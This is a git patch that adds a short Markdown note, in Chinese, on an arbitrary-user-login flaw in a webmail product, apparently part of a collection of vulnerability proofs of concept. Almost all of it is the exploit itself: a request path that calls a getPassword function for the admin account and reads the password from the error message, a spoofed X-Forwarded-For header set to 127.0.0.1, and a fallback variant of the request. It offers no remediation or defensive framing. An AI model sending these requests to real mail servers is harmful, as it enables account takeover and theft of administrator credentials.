From 1637ac33fb3cf7fffb755d3352fc6838d8f818d0 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Mon, 21 Aug 2023 21:14:00 +0800
Subject: [PATCH] =?UTF-8?q?Create=20WEBMAIL=E5=AD=98=E5=9C=A8=E4=BB=BB?=
 =?UTF-8?q?=E6=84=8F=E7=94=A8=E6=88=B7=E7=99=BB=E5=BD=95=E6=BC=8F=E6=B4=9E?=
 =?UTF-8?q?.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 WEBMAIL存在任意用户登录漏洞.md | 11 +++++++++++
 1 file changed, 11 insertions(+)
 create mode 100644 WEBMAIL存在任意用户登录漏洞.md

diff --git a/WEBMAIL存在任意用户登录漏洞.md b/WEBMAIL存在任意用户登录漏洞.md
new file mode 100644
index 0000000..56daa1c
--- /dev/null
+++ b/WEBMAIL存在任意用户登录漏洞.md
@@ -0,0 +1,11 @@
+## WEBMAIL存在任意用户登录漏洞
+
+```
+RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin
+回显errormsg为密码
+用户名为 admin
+添加头 X-Forwarded-For: 127.0.0.1
+
+如果有登录失败的话，使用
+/RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 登录
+```